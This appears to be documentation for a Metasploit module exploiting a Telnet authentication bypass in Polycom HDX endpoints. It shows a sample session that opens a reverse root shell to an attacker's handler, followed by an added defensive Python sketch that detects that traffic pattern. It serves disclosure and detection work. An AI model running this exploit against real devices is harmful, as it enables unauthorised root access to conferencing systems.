This module exploits an authentication bypass in Polycom HDX video endpoints running software version <= 3.0.5. It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port 23 must be reachable, as it is in the factory default configuration.
A successful run of the exploit will look like this:

    msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
    msf exploit(psh_auth_bypass) > run
    [*] Started reverse double SSL handler on 192.168.1.120:4444
    [*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
    [+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
    [+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo xInxktvgUmm7hPyh;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "xInxktvgUmm7hPyh\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
    [*] 192.168.1.155:23 - Shutting down payload stager listener...
    whoami
    root
    uname -a
    Linux polycom.lan 22.214.171.124-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
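
A defender-side reading of the session above, as an added example that is not part of the module or its documentation: the run shows one host opening many parallel Telnet connections and the endpoint then connecting back to that host, and this sketch flags that pattern in flow records. The record format, the thresholds and the function names are assumptions, and the sample flows are constructed using the addresses from the output.

```python
from collections import defaultdict

def sample_flows():
    """Constructed flow records (ts_seconds, src_ip, dst_ip, dst_port); not captured traffic."""
    attacker, endpoint = "192.168.1.120", "192.168.1.155"  # addresses from the output above
    flows = [(1000 + i * 0.1, attacker, endpoint, 23) for i in range(100)]
    flows += [(1012.0, endpoint, attacker, 4444),   # endpoint connects back to the handler
              (1012.1, endpoint, attacker, 4444),   # second connection of the double handler
              (2000.0, "192.168.1.50", endpoint, 23),    # constructed: one admin Telnet login
              (2050.0, endpoint, "192.168.1.10", 443)]   # constructed: routine outbound call
    return flows

def detect(flows, endpoints, burst=20, window=10.0, followup=60.0):
    """Flag a source that opens >= burst Telnet connections to an endpoint within
    `window` seconds; escalate if the endpoint then connects back to that source."""
    flows = sorted(flows)
    telnet = defaultdict(list)  # (source, endpoint) -> timestamps of TCP/23 connections
    for ts, src, dst, dport in flows:
        if dst in endpoints and dport == 23:
            telnet[(src, dst)].append(ts)
    alerts = []
    for (src, ep), times in telnet.items():
        burst_at, lo = None, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the window start forward
                lo += 1
            if hi - lo + 1 >= burst:
                burst_at = t
                break
        if burst_at is None:
            continue
        callbacks = [(ts, dport) for ts, s, d, dport in flows
                     if s == ep and d == src and burst_at <= ts <= burst_at + followup]
        alerts.append({"endpoint": ep, "source": src, "burst_at": burst_at,
                       "severity": "critical" if callbacks else "high",
                       "callbacks": callbacks})
    return alerts

if __name__ == "__main__":
    for alert in detect(sample_flows(), {"192.168.1.155"}):
        print(alert)
```

The default thresholds are illustrative; tune `burst` and `window` against the normal Telnet administration traffic seen on the network being monitored.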